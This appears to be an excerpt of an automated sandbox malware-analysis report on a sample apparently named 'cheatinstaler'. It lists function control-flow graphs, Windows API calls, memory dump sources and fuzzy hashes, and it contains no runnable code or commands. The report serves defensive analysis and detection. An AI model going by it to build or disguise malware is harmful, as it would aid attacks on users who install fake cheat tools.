                                                                                  control_flow_graph 4075 7ff754552ce0-7ff754552d0a 4076 7ff754552d0c-7ff754552d0e 4075->4076 4077 7ff754552d13-7ff754552d1b 4075->4077 4078 7ff754552ea9-7ff754552ec4 call 7ff754572320 4076->4078 4079 7ff754552d2b 4077->4079 4080 7ff754552d1d-7ff754552d28 GetStdHandle 4077->4080 4082 7ff754552d31-7ff754552d3d 4079->4082 4080->4079 4084 7ff754552d86-7ff754552da2 WriteFile 4082->4084 4085 7ff754552d3f-7ff754552d44 4082->4085 4088 7ff754552da6-7ff754552da9 4084->4088 4086 7ff754552d46-7ff754552d7a WriteFile 4085->4086 4087 7ff754552daf-7ff754552db3 4085->4087 4086->4088 4089 7ff754552d7c-7ff754552d82 4086->4089 4090 7ff754552ea2-7ff754552ea6 4087->4090 4091 7ff754552db9-7ff754552dbd 4087->4091 4088->4087 4088->4090 4089->4086 4092 7ff754552d84 4089->4092 4090->4078 4091->4090 4093 7ff754552dc3-7ff754552dd8 call 7ff75454b4f8 4091->4093 4092->4088 4096 7ff754552e1e-7ff754552e6d call 7ff75457797c call 7ff75454129c call 7ff75454bca8 4093->4096 4097 7ff754552dda-7ff754552de1 4093->4097 4096->4090 4108 7ff754552e6f-7ff754552e86 4096->4108 4097->4082 4099 7ff754552de7-7ff754552de9 4097->4099 4099->4082 4101 7ff754552def-7ff754552e19 4099->4101 4101->4082 4109 7ff754552e9d call 7ff75457220c 4108->4109 4110 7ff754552e88-7ff754552e9b 4108->4110 4109->4090 4110->4109 4111 7ff754552ec5-7ff754552ecb call 7ff754577904 4110->4111
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite$Handle
                                                                                  • String ID:
                                                                                  • API String ID: 4209713984-0
                                                                                  • Opcode ID: 36bd0183a846d9ba9312903715bf2ef21d1db3e0abb52a3d50b28083c89a0b57
                                                                                  • Instruction ID: 069681b02f61faadee6248585d006f9b52d986714ac7f97b232d439097ca242f
                                                                                  • Opcode Fuzzy Hash: 36bd0183a846d9ba9312903715bf2ef21d1db3e0abb52a3d50b28083c89a0b57
                                                                                  • Instruction Fuzzy Hash: EF51C362A1964292FA54AF26D8A47BAA350FB44B94FD80131FA0D07AD4DF3CE585C720
                                                                                  Function 00007FF7545703E0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$ItemText
                                                                                  • String ID:
                                                                                  • API String ID: 3750147219-0
                                                                                  • Opcode ID: fc1dbc180cc96f95be2c8896ee01285d2f87486fd65e1fc7a35e6e120e6522b5
                                                                                  • Instruction ID: 5fd91142b847e4643dfee30f3f1250e6b1d9ec3594d7e680710b7c64409021a3
                                                                                  • Opcode Fuzzy Hash: fc1dbc180cc96f95be2c8896ee01285d2f87486fd65e1fc7a35e6e120e6522b5
                                                                                  • Instruction Fuzzy Hash: 6851B462F1465285FF00AF76D8A42ADA362BF45BE4FD80631EA1C167D6DF6CD540C320
                                                                                  Function 00007FF754572D6C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                  • String ID:
                                                                                  • API String ID: 1452418845-0
                                                                                  • Opcode ID: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                  • Instruction ID: a4a6000f351bfdafaa1318f7714c4036b0349d213423ef8cf6aec2f02ea94c0b
                                                                                  • Opcode Fuzzy Hash: f380b52e8f95e6a0f24ce785192d8cb773bc143ddf3d62aee805abe4fb8ed354
                                                                                  • Instruction Fuzzy Hash: 43311821E0820242FA69BF6794F53B9A391BF413C4FDC5434EA4E4B6D3DE2CA645C271
                                                                                  Function 00007FF754553684 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 2359106489-0
                                                                                  • Opcode ID: 4afa93bd4a700d257cdc7d509a41c9c5d78617ffec5cec458594de29b09af307
                                                                                  • Instruction ID: 33e8d05455822aa80aa2da9a1fce7d2fa4f4dbec280943c01475653225351e52
                                                                                  • Opcode Fuzzy Hash: 4afa93bd4a700d257cdc7d509a41c9c5d78617ffec5cec458594de29b09af307
                                                                                  • Instruction Fuzzy Hash: CC318262E1C68281EA60AF26B4E42B9E351FB887A0FD80231FB9D47695DF3CD5458620
                                                                                  Function 00007FF754580B78 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF75457C45B), ref: 00007FF754580B91
                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF75457C45B), ref: 00007FF754580BF3
                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF75457C45B), ref: 00007FF754580C2D
                                                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF75457C45B), ref: 00007FF754580C57
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                  • String ID:
                                                                                  • API String ID: 1557788787-0
                                                                                  • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                  • Instruction ID: ca6fb63a0ad483258f315fc71abb8270dba669d66e0406a12acc1d6d17d2c388
                                                                                  • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                  • Instruction Fuzzy Hash: 54215E31B19B5181F664AF13A4A0029F6A4FBA8FD0F9D4134DE8E63BA4DF3CE4528314
                                                                                  Function 00007FF754552320 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$FileHandleRead
                                                                                  • String ID:
                                                                                  • API String ID: 2244327787-0
                                                                                  • Opcode ID: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                                  • Instruction ID: e057f497bac6e0fe9857ba95e08ee0bcb098cad169c1c61c5795c9638e0a3a97
                                                                                  • Opcode Fuzzy Hash: 5dece825d5be91adec6864fa12bb564f4e3b5809c08bfde6ef0babe01e3581d0
                                                                                  • Instruction Fuzzy Hash: 4D216221A0C542C1EA686F13A4A02B9E3A0FF45B94FED4531FA5D46684DF7CD8858F72
                                                                                  Function 00007FF75455E948 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF75455ECD8: ResetEvent.KERNEL32 ref: 00007FF75455ECF1
                                                                                    • Part of subcall function 00007FF75455ECD8: ReleaseSemaphore.KERNEL32 ref: 00007FF75455ED07
                                                                                  • ReleaseSemaphore.KERNEL32 ref: 00007FF75455E974
                                                                                  • FindCloseChangeNotification.KERNELBASE ref: 00007FF75455E993
                                                                                  • DeleteCriticalSection.KERNEL32 ref: 00007FF75455E9AA
                                                                                  • CloseHandle.KERNEL32 ref: 00007FF75455E9B7
                                                                                    • Part of subcall function 00007FF75455EA5C: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF75455E95F,?,?,?,00007FF75455463A,?,?,?), ref: 00007FF75455EA63
                                                                                    • Part of subcall function 00007FF75455EA5C: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF75455E95F,?,?,?,00007FF75455463A,?,?,?), ref: 00007FF75455EA6E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseReleaseSemaphore$ChangeCriticalDeleteErrorEventFindHandleLastNotificationObjectResetSectionSingleWait
                                                                                  • String ID:
                                                                                  • API String ID: 2143293610-0
                                                                                  • Opcode ID: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                                  • Instruction ID: 24b46e6a7b31bae6b3b0d5fc7cf5510707f8fd0fdf336760e3e44efb4985916c
                                                                                  • Opcode Fuzzy Hash: 7c4c69b688bb09167c3d8ec6f4195a818a409db0987586a56ae23aa503e7e0cd
                                                                                  • Instruction Fuzzy Hash: 8701ED32A19A91D2E658EF22E5A42ADB331FB84B90F544031EB5D03665CF39E4B58750
                                                                                  Function 00007FF75455EAA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Thread$CreatePriority
                                                                                  • String ID: CreateThread failed
                                                                                  • API String ID: 2610526550-3849766595
                                                                                  • Opcode ID: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                                  • Instruction ID: e5d46c1daa7ca417440810b6076aa3b8ff2c260be9b456c876a8645b55e29300
                                                                                  • Opcode Fuzzy Hash: cf4f3858e1c5421656891f758a667cd72a6f2059ba57d4f8d940dbc9b5e0f540
                                                                                  • Instruction Fuzzy Hash: 4C115E32A18A4282E710EF12E8A11B9F360FB84B95F9C4131EA4D07668DF3CE545C720
                                                                                  Function 00007FF75456946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26comCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: DirectoryInitializeMallocSystem
                                                                                  • String ID: riched20.dll
                                                                                  • API String ID: 174490985-3360196438
                                                                                  • Opcode ID: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
                                                                                  • Instruction ID: 7cd8dec6b71e09e3fb8471a58ce46e01842eaebff516b0134aeca205a4817168
                                                                                  • Opcode Fuzzy Hash: b1936b3f38021c99ecd6522b050f6163774a90ef7a51b133bb98bdb322c125e4
                                                                                  • Instruction Fuzzy Hash: 2FF06272618A4182EB00AF62F4A41AEF3A0FF88755FC80135EA8D42B54DF7CE14DCB10
                                                                                  Function 00007FF75456095C Relevance: 4.7, APIs: 3, Instructions: 152windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00007FF75456853C: GlobalMemoryStatusEx.KERNEL32 ref: 00007FF75456856C
                                                                                    • Part of subcall function 00007FF75455AAE0: LoadStringW.USER32 ref: 00007FF75455AB67
                                                                                    • Part of subcall function 00007FF75455AAE0: LoadStringW.USER32 ref: 00007FF75455AB80
                                                                                    • Part of subcall function 00007FF754541FA0: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF754541FFB
                                                                                    • Part of subcall function 00007FF75454129C: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF754541396
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7545701BB
                                                                                  • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7545701C1
                                                                                  • SendDlgItemMessageW.USER32 ref: 00007FF7545701F2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$LoadString$Concurrency::cancel_current_taskGlobalItemMemoryMessageSendStatus
                                                                                  • String ID:
                                                                                  • API String ID: 3106221260-0
                                                                                  • Opcode ID: bd759a4fa0bd9309ccea4b20fd132112b516600e79edc36bc9085e82c2e5f9f2
                                                                                  • Instruction ID: 305c05df4e82614ace8815daf7cef1a2efe27f1684b599e8806225c3fd549d9d
                                                                                  • Opcode Fuzzy Hash: bd759a4fa0bd9309ccea4b20fd132112b516600e79edc36bc9085e82c2e5f9f2
                                                                                  • Instruction Fuzzy Hash: B451B162F1564256FB10BFA2D4A52FDA362AB85BC4F980135EE0D5B7D6DE2CE500C360
                                                                                  Function 00007FF754552134 Relevance: 4.6, APIs: 3, Instructions: 114fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile$_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 2272807158-0
                                                                                  • Opcode ID: 0c3154c3ea30730f01a4f8c09a6becc7efe45a6579d5a839052cc1f3b70dbf60
                                                                                  • Instruction ID: 485affee4a94fe68e040632725e5200b879ea757e291534e1bddd0760eac40af
                                                                                  • Opcode Fuzzy Hash: 0c3154c3ea30730f01a4f8c09a6becc7efe45a6579d5a839052cc1f3b70dbf60
                                                                                  • Instruction Fuzzy Hash: 7841A67260878182EA14AF16E4942B9B3A1FB847B4F985734FB6D07AD5CF3CD4908710
                                                                                  Function 00007FF7545423F8 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: TextWindow$Length_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 2176759853-0
                                                                                  • Opcode ID: 7a493db6b2aa3cd2f88e086a9d80210bd8f4b3ce53d8088c5f8b34bcaf14f9b4
                                                                                  • Instruction ID: 39f95eb7e23c9fee0884e731427eab497d4bbd583be049d9ca4acbfae75bfdcf
                                                                                  • Opcode Fuzzy Hash: 7a493db6b2aa3cd2f88e086a9d80210bd8f4b3ce53d8088c5f8b34bcaf14f9b4
                                                                                  • Instruction Fuzzy Hash: 80219372A28B8181EA149F66A49017EA364FB89BD0FA84235FB9D07B95CF3CD140C740
                                                                                  Function 00007FF754561F94 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: std::bad_alloc::bad_alloc
                                                                                  • String ID:
                                                                                  • API String ID: 1875163511-0
                                                                                  • Opcode ID: 21b91969b9d64179b995d4837780b836304a3883ec3903795673f1ee3d55d581
                                                                                  • Instruction ID: cd054f0bd998aebd0657d13e766806c2c0aa20cfaa858e2b0e74067abad98b50
                                                                                  • Opcode Fuzzy Hash: 21b91969b9d64179b995d4837780b836304a3883ec3903795673f1ee3d55d581
                                                                                  • Instruction Fuzzy Hash: AB317412A09686A1FF25BF16E4A43B9E3A0FB50794FDC4431E64C069A5DF7CEA46C311
                                                                                  Function 00007FF754553D34 Relevance: 4.6, APIs: 3, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile$_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 1203560049-0
                                                                                  • Opcode ID: f54af9b99a092d8e3351366c83bb5c41e52826feeb3933286249cd948367a950
                                                                                  • Instruction ID: 41105516fb813c966f1d42bd1b651fb487abcee55ef2487c7a7b9047d6cca7dc
                                                                                  • Opcode Fuzzy Hash: f54af9b99a092d8e3351366c83bb5c41e52826feeb3933286249cd948367a950
                                                                                  • Instruction Fuzzy Hash: AB21B822A1868581FA20AF26F4E52B9B361FF847D4F985230FB9D47695DF2CD540C610
                                                                                  Function 00007FF7545531BC Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON
